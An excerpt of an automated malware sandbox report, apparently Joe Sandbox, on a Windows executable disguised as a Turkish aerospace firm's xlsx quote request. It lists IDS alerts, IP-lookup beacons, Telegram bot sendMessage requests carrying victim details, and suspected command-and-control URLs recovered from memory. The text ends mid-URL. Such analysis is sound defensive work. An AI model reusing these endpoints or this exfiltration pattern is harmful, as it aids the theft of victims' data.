                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 4x nop then jmp 06510D0Dh16_2_06510B30
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 4x nop then jmp 06511697h16_2_06510B30
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 4x nop then jmp 06512C19h16_2_06512968
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 4x nop then jmp 0651E959h16_2_0651E6B0
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 4x nop then jmp 0651F209h16_2_0651EF60
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 4x nop then jmp 0651CF49h16_2_0651CCA0
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 4x nop then jmp 0651D7F9h16_2_0651D550
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 4x nop then jmp 065131E0h16_2_06512DBE
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 4x nop then jmp 0651E501h16_2_0651E258
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 4x nop then jmp 0651EDB1h16_2_0651EB08
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 4x nop then jmp 0651F661h16_2_0651F3B8
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h16_2_06510040
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 4x nop then jmp 0651FAB9h16_2_0651F810
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 4x nop then jmp 0651D3A1h16_2_0651D0F8
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 4x nop then jmp 065131E0h16_2_0651310E
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 4x nop then jmp 0651DC51h16_2_0651D9A8

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49749 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49742 -> 149.154.167.220:443
                  Source: unknownDNS query: name: api.telegram.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:783875%0D%0ADate%20and%20Time:%2019/02/2025%20/%2018:31:55%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20783875%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:783875%0D%0ADate%20and%20Time:%2019/02/2025%20/%2018:02:24%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20783875%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49712 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49719 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49707 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49711 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49721 -> 104.21.80.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49710 -> 104.21.80.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49734 -> 104.21.80.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49717 -> 104.21.80.1:443
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49708 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49714 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:783875%0D%0ADate%20and%20Time:%2019/02/2025%20/%2018:31:55%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20783875%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:783875%0D%0ADate%20and%20Time:%2019/02/2025%20/%2018:02:24%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20783875%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 19 Feb 2025 09:38:31 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 19 Feb 2025 09:38:34 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 00000000.00000002.2036673189.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000009.00000002.2077441641.000000000411C000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4483172378.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 00000000.00000002.2036673189.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000009.00000002.2077441641.000000000411C000.00000004.00000800.00020000.00000000.sdmp, T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4483176808.0000000000433000.00000040.00000400.00020000.00000000.sdmp, T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4491137274.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 00000000.00000002.2036673189.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000009.00000002.2077441641.000000000411C000.00000004.00000800.00020000.00000000.sdmp, T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4483176808.0000000000433000.00000040.00000400.00020000.00000000.sdmp, T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4491137274.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4491137274.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4491137274.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 00000000.00000002.2036673189.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000009.00000002.2077441641.000000000411C000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4483172378.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: powershell.exe, 00000003.00000002.2060845922.0000000005729000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000003.00000002.2046510253.0000000004815000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000003.00000002.2046510253.0000000004815000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 00000000.00000002.2035924759.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2046510253.00000000046C1000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000009.00000002.2075038061.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4491137274.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000003.00000002.2046510253.0000000004815000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, WheTgQY.exe.0.drString found in binary or memory: http://tempuri.org/DataTableUsers.xsd
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 00000000.00000002.2036673189.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000009.00000002.2077441641.000000000411C000.00000004.00000800.00020000.00000000.sdmp, T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4483176808.0000000000433000.00000040.00000400.00020000.00000000.sdmp, T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4491137274.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: powershell.exe, 00000003.00000002.2046510253.0000000004815000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4500304672.0000000003A72000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4500335062.0000000003813000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: powershell.exe, 00000003.00000002.2046510253.00000000046C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBeq
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4491137274.0000000002B38000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.00000000028D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 00000000.00000002.2036673189.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000009.00000002.2077441641.000000000411C000.00000004.00000800.00020000.00000000.sdmp, T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4491137274.0000000002B38000.00000004.00000800.00020000.00000000.sdmp, T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4483176808.0000000000435000.00000040.00000400.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.00000000028D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4491137274.0000000002B38000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.00000000028D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4491137274.0000000002B38000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.00000000028D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:783875%0D%0ADate%20a
